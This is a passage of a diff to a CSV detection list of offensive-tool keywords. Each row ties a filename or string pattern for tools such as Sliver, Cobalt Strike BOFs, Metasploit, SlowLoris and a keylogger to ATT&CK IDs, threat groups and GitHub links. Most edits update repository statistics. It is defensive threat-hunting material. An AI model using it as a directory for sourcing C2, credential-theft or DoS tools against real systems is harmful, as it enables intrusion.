security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*sipdump2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*sipvicious_svcrack* -u100","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*sitadel http://*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "*sitadel https://*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "*sitadel.py *","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - 
T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "*Sitadel-master.zip*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" -"*site-packages/wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*-Situational-Awareness-BOF*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass 
- Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*site-packages/wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*-Situational-Awareness-BOF*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" "*skahwah*wordsmith*","offensive_tool_keyword","wordsmith","The aim of Wordsmith is to assist with creating tailored wordlists and usernames that are primarilly based on geolocation.","T1210.001 - T1583.001 - T1583.002","TA0007 - 
","N/A","N/A","Credential Access","https://github.com/skahwah/wordsmith","1","1","N/A","N/A","2","158","21","2018-05-03T13:44:01Z","2016-07-06T14:02:51Z" "*skelsec/jackdaw*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 - T1590 - T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" -"*SkipPasswordAgeCheck*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*SkipPortScan*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SkipPasswordAgeCheck*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*SkipPortScan*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" 
"*skymem-get-mails *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*SLACKAES256Handler.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*slackor.db*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" 
@@ -16961,156 +17144,156 @@ "*sleepmask.x86.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleepmask_pivot.x64.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleepmask_pivot.x86.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" -"*slemire/WSPCoerce*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","202","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*slemire/WSPCoerce*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*SlinkyCat.ps1*","offensive_tool_keyword","SlinkyCat","This script performs a series 
of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*SlinkyCat-main*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" -"*Sliver C2 Session*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver.service*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver.sh/install*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" 
-"*sliver/.sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver:sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver_pcap_parser.py*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver-client_linux*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver-client_macos*","offensive_tool_keyword","sliver","Sliver is an open 
source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver-client_windows.exe*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver-dns*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*SliverKeylogger*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","126","37","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" -"*sliverpb*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - 
T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver-server daemon*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver-server.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*SlowLoris*","offensive_tool_keyword","SlowLoris","Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this","T1498 - T1496 - T1490","TA0002 - TA0004 - TA0007","N/A","N/A","DDOS","https://github.com/gkbrk/slowloris","1","1","N/A","N/A","10","2169","671","2023-05-05T19:21:29Z","2015-04-26T10:00:33Z" -"*slowloris.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. 
payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Sliver C2 Session*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver.service*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver.sh/install*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver/.sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver:sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver_pcap_parser.py*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-client_linux*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-client_macos*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-client_windows.exe*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-dns*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*SliverKeylogger*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - 
Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"*sliverpb*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-server daemon*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-server.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 